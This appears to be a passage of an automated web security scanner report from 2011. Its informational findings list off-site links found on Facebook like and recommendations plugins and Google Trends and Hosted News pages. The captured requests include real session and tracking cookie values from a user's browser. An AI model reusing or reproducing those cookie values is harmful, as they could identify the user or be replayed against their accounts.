http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/a8-71wQDIx3.js
http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/y4c155TFG-h.css
http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/OJBsowkZPti.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.220.31
X-Cnection: close
Date: Mon, 13 Jun 2011 11:01:43 GMT
Content-Length: 14814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/XdqqM7LeZ4W.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/y4c155TFG-h.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/a8-71wQDIx3.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/xfp-ll5tNb2.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/OJBsowkZPti.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/AkVjWVFFdhX.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/pages/FanSided/108254959223467" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41790_108254959223467_1942_q.jpg" alt="FanSided" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/abakeg1wv" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186607_1309745445_4037101_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/260945_1651976342_4097640_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=902160494" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/202863_902160494_362800_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1423332305" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41643_1423332305_1556_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/WMiller6381" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/173686_1790585967_6690758_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/kfs49ers" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/260986_552453252_5344107_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/melonad" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195490_100001037892679_5713005_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000532061024" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/27421_100000532061024_7084_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001889546696" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161187_100001889546696_7413417_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161180_1424363127_6460252_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001771002242" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/70843_100001771002242_4286354_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000591402725" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/70774_100000591402725_3978992_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001995157834" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186211_100001995157834_612714_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=508087898" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203050_508087898_4232854_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/rezmidou" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195351_1393185790_4706150_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002518235086" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187465_100002518235086_5942544_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" alt="" width="14" height="14" /></a>
...[SNIP]...

18.223. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/recommendations.php?api_key=125384590834102&border_color=%23fff&colorscheme=light&font=arial&header=false&height=310&locale=en_US&sdk=joey&site=thesouthern.com&width=278

The response contains the following links to other domains:

http://external.ak.fbcdn.net/safe_image.php?d=0adb2e46591b22cd3f88ce251daafa1d&url=http%3A%2F%2Fbloximages.chicago2.vip.townnews.com%2Fthesouthern.com%2Fcontent%2Ftncms%2Fassets%2Feditorial%2Fd%2F80%2Fa0c%2Fd80a0c78-b6fd-5748-a092-524f40741965-revisions%2F4dc74eb019fb9.preview-100.jpg
http://external.ak.fbcdn.net/safe_image.php?d=33377c2559ff9518da9f31210ab02b72&url=http%3A%2F%2Fbloximages.chicago2.vip.townnews.com%2Fthesouthern.com%2Fcontent%2Ftncms%2Fassets%2Feditorial%2Fe%2F32%2F485%2Fe3248504-1d3d-57c7-96b1-9c1f9e9008f5-revisions%2F4dc325b3a0c35.preview-100.jpg
http://external.ak.fbcdn.net/safe_image.php?d=51b79943983c4c512eb35e984e633298&url=http%3A%2F%2Fthesouthern.com%2Fcontent%2Ftncms%2Flive%2Fglobal%2Fresources%2Fimages%2Fthesouthern_logo.jpg
http://external.ak.fbcdn.net/safe_image.php?d=5899309f1595ef060fcee830ad2f4f30&url=http%3A%2F%2Fbloximages.chicago2.vip.townnews.com%2Fthesouthern.com%2Fcontent%2Ftncms%2Fassets%2Feditorial%2Fd%2F18%2Fbbc%2Fd18bbcb2-3e33-5c50-814d-bea121321799-revisions%2F4dc325bc2aff3.preview-100.jpg
http://external.ak.fbcdn.net/safe_image.php?d=7621ef2c1a3468c4fdf35fd22e4a69e7&url=http%3A%2F%2Fbloximages.chicago2.vip.townnews.com%2Fthesouthern.com%2Fcontent%2Ftncms%2Fassets%2Feditorial%2F5%2Fbe%2F18f%2F5be18fb2-f1e5-5930-9f12-9af9ada14bfe-revisions%2F4dc8ae944a1ec.preview-100.jpg
http://external.ak.fbcdn.net/safe_image.php?d=a08192c156a5cfff10caf0ae194bbdbd&url=http%3A%2F%2Fbloximages.chicago2.vip.townnews.com%2Fthesouthern.com%2Fcontent%2Ftncms%2Fassets%2Feditorial%2F2%2F7e%2Fc27%2F27ec271f-92df-5ca3-b0ea-03340c33c3ea-revisions%2F4dc0d3f2001ce.preview-100.jpg
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/XdqqM7LeZ4W.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/a8-71wQDIx3.js
http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/y4c155TFG-h.css
http://thesouthern.com/image_d80a0c78-b6fd-5748-a092-524f40741965.html
http://thesouthern.com/news/local/article_73fdd346-7ab8-11e0-a7ad-001cc4c002e0.html
http://thesouthern.com/news/local/article_a6c37b00-7798-11e0-b3ae-001cc4c002e0.html
http://thesouthern.com/news/local/article_df41cb14-7606-11e0-8685-001cc4c03286.html
http://thesouthern.com/news/local/state-and-regional/article_9f4cdd60-75a1-11e0-bf7b-001cc4c03286.html
http://www.thesouthern.com/news/local/article_0a1dda0c-779d-11e0-88dd-001cc4c002e0.html

Request

GET /plugins/recommendations.php?api_key=125384590834102&border_color=%23fff&colorscheme=light&font=arial&header=false&height=310&locale=en_US&sdk=joey&site=thesouthern.com&width=278 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.235.55
X-Cnection: close
Date: Mon, 13 Jun 2011 11:21:13 GMT
Content-Length: 13350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/XdqqM7LeZ4W.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/y4c155TFG-h.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/a8-71wQDIx3.js"></script>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_60ffef15cec4a66f"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://thesouthern.com/news/local/article_73fdd346-7ab8-11e0-a7ad-001cc4c002e0.html" title="Killer coal?" target="_top"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=7621ef2c1a3468c4fdf35fd22e4a69e7&url=http%3A%2F%2Fbloximages.chicago2.vip.townnews.com%2Fthesouthern.com%2Fcontent%2Ftncms%2Fassets%2Feditorial%2F5%2Fbe%2F18f%2F5be18fb2-f1e5-5930-9f12-9af9ada14bfe-revisions%2F4dc8ae944a1ec.preview-100.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://thesouthern.com/news/local/article_73fdd346-7ab8-11e0-a7ad-001cc4c002e0.html" target="_top">Killer coal?</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_7e52f8ef1583fc1d"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.thesouthern.com/news/local/article_0a1dda0c-779d-11e0-88dd-001cc4c002e0.html" title="Ten honored as ...Leaders Among Us... at breakfast" target="_top"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=5899309f1595ef060fcee830ad2f4f30&url=http%3A%2F%2Fbloximages.chicago2.vip.townnews.com%2Fthesouthern.com%2Fcontent%2Ftncms%2Fassets%2Feditorial%2Fd%2F18%2Fbbc%2Fd18bbcb2-3e33-5c50-814d-bea121321799-revisions%2F4dc325bc2aff3.preview-100.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.thesouthern.com/news/local/article_0a1dda0c-779d-11e0-88dd-001cc4c002e0.html" target="_top">Ten honored as ...Leaders Among Us... at breakfast</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_7554a6db6c2ed6c7"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://thesouthern.com/image_d80a0c78-b6fd-5748-a092-524f40741965.html" title="Image : Zack Farner Scholarship.jpg" target="_top"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=0adb2e46591b22cd3f88ce251daafa1d&url=http%3A%2F%2Fbloximages.chicago2.vip.townnews.com%2Fthesouthern.com%2Fcontent%2Ftncms%2Fassets%2Feditorial%2Fd%2F80%2Fa0c%2Fd80a0c78-b6fd-5748-a092-524f40741965-revisions%2F4dc74eb019fb9.preview-100.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://thesouthern.com/image_d80a0c78-b6fd-5748-a092-524f40741965.html" target="_top">Image : Zack Farner Scholarship.jpg</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_196d1c8e390c1c81"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://thesouthern.com/news/local/article_df41cb14-7606-11e0-8685-001cc4c03286.html" title="Superman's hometown taking a beating" target="_top"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=a08192c156a5cfff10caf0ae194bbdbd&url=http%3A%2F%2Fbloximages.chicago2.vip.townnews.com%2Fthesouthern.com%2Fcontent%2Ftncms%2Fassets%2Feditorial%2F2%2F7e%2Fc27%2F27ec271f-92df-5ca3-b0ea-03340c33c3ea-revisions%2F4dc0d3f2001ce.preview-100.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://thesouthern.com/news/local/article_df41cb14-7606-11e0-8685-001cc4c03286.html" target="_top">Superman's hometown taking a beating</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_843d0379079feb4"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://thesouthern.com/news/local/state-and-regional/article_9f4cdd60-75a1-11e0-bf7b-001cc4c03286.html" title="Jackson Co. in need of volunteers for sandbagging" target="_top"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=51b79943983c4c512eb35e984e633298&url=http%3A%2F%2Fthesouthern.com%2Fcontent%2Ftncms%2Flive%2Fglobal%2Fresources%2Fimages%2Fthesouthern_logo.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://thesouthern.com/news/local/state-and-regional/article_9f4cdd60-75a1-11e0-bf7b-001cc4c03286.html" target="_top">Jackson Co. in need of volunteers for sandbagging</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_4e4cbe7e640df89a"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://thesouthern.com/news/local/article_a6c37b00-7798-11e0-b3ae-001cc4c002e0.html" title="People help each other during flood" target="_top"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=33377c2559ff9518da9f31210ab02b72&url=http%3A%2F%2Fbloximages.chicago2.vip.townnews.com%2Fthesouthern.com%2Fcontent%2Ftncms%2Fassets%2Feditorial%2Fe%2F32%2F485%2Fe3248504-1d3d-57c7-96b1-9c1f9e9008f5-revisions%2F4dc325b3a0c35.preview-100.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://thesouthern.com/news/local/article_a6c37b00-7798-11e0-b3ae-001cc4c002e0.html" target="_top">People help each other during flood</a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=2" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" alt="" width="14" height="14" /></a>
...[SNIP]...

18.224. http://www.facebook.com/widgets/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/widgets/like.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/widgets/like.php?width=280&show_faces=1&layout=standard&href=http%3A%2F%2Fwww.imdb.com%2Ftitle%2Ftt0944947%2F

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/Ou0QNrclV2b.js
http://static.ak.fbcdn.net/rsrc.php/v1/yY/r/SqDoi07-B2a.css
http://static.ak.fbcdn.net/rsrc.php/v1/yY/r/eptfJSfAjrr.js
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/a8-71wQDIx3.js

Request

Response

18.225. http://www.google.com/hostednews/ap/article/ALeqM5iGfrQs22UmRhzj0PiJzcmIjzcnKg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/hostednews/ap/article/ALeqM5iGfrQs22UmRhzj0PiJzcmIjzcnKg

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/hostednews/ap/article/ALeqM5iGfrQs22UmRhzj0PiJzcmIjzcnKg?docId=06bdeb4400a149318fc82f3f073766d1

The response contains the following links to other domains:

http://espn.go.com/blog/dallas/mavericks/post/_/id/4679548/jet-believes-he-team-poised-for-breakout
http://espn.go.com/blog/truehoop/post/_/id/30046/mavs-continue-postseason-of-comebacks
http://googlenewsblog.blogspot.com/
http://www.star-telegram.com/2011/06/10/3144303/forget-lebron-and-his-teammates.html

Request

GET /hostednews/ap/article/ALeqM5iGfrQs22UmRhzj0PiJzcmIjzcnKg?docId=06bdeb4400a149318fc82f3f073766d1 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=47=lorCzpeeruyCsbBVsWEMMq0Dn_FEZO2YvQlh5PbRyvyK-EGYzmwzyA_2p0yLU1EIOsGj5P7ltQDj-N2Ero7RzOq6NjJuFZs5xUAH3SXWEGgb9bkdrXqd248wCK5T3lcc

Response

HTTP/1.1 200 OK
X-Robots-Tag: noarchive
X-Robots-Tag: unavailable_after: 13-Jul-2011 02:08:27 PDT
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:00:59 GMT
Expires: Mon, 13 Jun 2011 11:00:59 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 21576
Server: GSE

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><title>The Associated Press: Mavs show their depth, teamwork in title clincher</title>
<meta http-
...[SNIP]...
<li><a href="http://espn.go.com/blog/truehoop/post/_/id/30046/mavs-continue-postseason-of-comebacks" onclick="pageTracker._trackPageview('/outgoing/related_news');">Mavs continue postseason of comebacks</a>
...[SNIP]...
<li><a href="http://espn.go.com/blog/dallas/mavericks/post/_/id/4679548/jet-believes-he-team-poised-for-breakout" onclick="pageTracker._trackPageview('/outgoing/related_news');">Jason Terry: Mavs poised for breakout</a>
...[SNIP]...
<li><a href="http://www.star-telegram.com/2011/06/10/3144303/forget-lebron-and-his-teammates.html" onclick="pageTracker._trackPageview('/outgoing/related_news');">Forget LeBron and his teammates: It's all about Dirk in this series</a>
...[SNIP]...
</a>
-
<a href="http://googlenewsblog.blogspot.com/">Blog</a>
...[SNIP]...

18.226. http://www.google.com/trends/hottrends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/trends/hottrends

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/trends/hottrends?q=greyson+chance&date=2011-6-13&sa=X

The response contains the following links to other domains:

http://interscope.com/artist/news/default.aspx?nid=35704&aid=1173
http://www.disneydreaming.com/
http://www.disneydreaming.com/2011/06/12/greyson-chance-on-so-random-tonight/
http://www.interscope.com/
http://www.teenvogue.com/industry/music-special/2011/greyson-chance-and-cody-simpson-tour-diary-part-two
http://www.teenvogue.com/services/rss/feeds/all.xml

Request

GET /trends/hottrends?q=greyson+chance&date=2011-6-13&sa=X HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=game+of+thrones&date=2011-6-13&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=47=lorCzpeeruyCsbBVsWEMMq0Dn_FEZO2YvQlh5PbRyvyK-EGYzmwzyA_2p0yLU1EIOsGj5P7ltQDj-N2Ero7RzOq6NjJuFZs5xUAH3SXWEGgb9bkdrXqd248wCK5T3lcc

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Mon, 13 Jun 2011 11:18:17 GMT
Server: Google Trends
Cache-Control: private, x-gzip-ok=""
Content-Length: 11237
X-XSS-Protection: 1; mode=block

<html>
<head>
<meta HTTP-EQUIV="content-type" CONTENT="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="/trends/html/gsearch.css">
<title>Google Trends: greyson chance, Jun 13,
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.disneydreaming.com/2011/06/12/greyson-chance-on-so-random-tonight/" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.disneydreaming.com/" target="_blank"> http://www.disneydreaming.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://interscope.com/artist/news/default.aspx?nid=35704&aid=1173" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.interscope.com/" target="_blank"> http://www.interscope.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.teenvogue.com/industry/music-special/2011/greyson-chance-and-cody-simpson-tour-diary-part-two" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.teenvogue.com/services/rss/feeds/all.xml" target="_blank"> http://www.teenvogue.com/services/rss/feeds/all.xml</a>
...[SNIP]...

18.227. http://www.google.com/trends/hottrends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/trends/hottrends

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/trends/hottrends?q=dallas+mavericks&date=2011-6-13&sa=X

The response contains the following links to other domains:

http://www.blazersedge.com/
http://www.blazersedge.com/2011/6/12/2220953/congratulations-dallas-mavericks
http://www.businessinsider.com/
http://www.businessinsider.com/bye-ami-heat-dallas-mavericks-win-the-nba-finals-2011-6
http://www.mavsmoneyball.com/
http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship

Request

GET /trends/hottrends?q=dallas+mavericks&date=2011-6-13&sa=X HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=47=lorCzpeeruyCsbBVsWEMMq0Dn_FEZO2YvQlh5PbRyvyK-EGYzmwzyA_2p0yLU1EIOsGj5P7ltQDj-N2Ero7RzOq6NjJuFZs5xUAH3SXWEGgb9bkdrXqd248wCK5T3lcc

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Mon, 13 Jun 2011 11:00:35 GMT
Server: Google Trends
Cache-Control: private, x-gzip-ok=""
Content-Length: 11212
X-XSS-Protection: 1; mode=block

<html>
<head>
<meta HTTP-EQUIV="content-type" CONTENT="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="/trends/html/gsearch.css">
<title>Google Trends: dallas mavericks, Jun 13
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.blazersedge.com/2011/6/12/2220953/congratulations-dallas-mavericks" target="_blank">
Congratulations <b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.blazersedge.com/" target="_blank"> http://www.blazersedge.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.businessinsider.com/bye-ami-heat-dallas-mavericks-win-the-nba-finals-2011-6" target="_blank">
The <b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.businessinsider.com/" target="_blank"> http://www.businessinsider.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship" target="_blank">
NBA Finals 2011: <b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.mavsmoneyball.com/" target="_blank"> http://www.mavsmoneyball.com/</a>
...[SNIP]...

18.228. http://www.google.com/trends/hottrends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/trends/hottrends

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/trends/hottrends?q=army+wives&date=2011-6-13&sa=X

The response contains the following links to other domains:

http://www.currentnewsindia.com/
http://www.currentnewsindia.com/technology/army-wives-a-american-drama-series.html
http://www.hiphopbeefs.info/
http://www.hiphopbeefs.info/army-wives-season-5-episode-13/
http://www.tvfanatic.com/
http://www.tvfanatic.com/2011/06/army-wives-review-farewell-to-arms/

Request

GET /trends/hottrends?q=army+wives&date=2011-6-13&sa=X HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=47=lorCzpeeruyCsbBVsWEMMq0Dn_FEZO2YvQlh5PbRyvyK-EGYzmwzyA_2p0yLU1EIOsGj5P7ltQDj-N2Ero7RzOq6NjJuFZs5xUAH3SXWEGgb9bkdrXqd248wCK5T3lcc

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Mon, 13 Jun 2011 11:00:33 GMT
Server: Google Trends
Cache-Control: private, x-gzip-ok=""
Content-Length: 11408
X-XSS-Protection: 1; mode=block

<html>
<head>
<meta HTTP-EQUIV="content-type" CONTENT="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="/trends/html/gsearch.css">
<title>Google Trends: army wives, Jun 13, 2011
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.tvfanatic.com/2011/06/army-wives-review-farewell-to-arms/" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.tvfanatic.com/" target="_blank"> http://www.tvfanatic.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.currentnewsindia.com/technology/army-wives-a-american-drama-series.html" target="_blank">
"<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.currentnewsindia.com/" target="_blank"> http://www.currentnewsindia.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.hiphopbeefs.info/army-wives-season-5-episode-13/" target="_blank">
<b>
...[SNIP]...
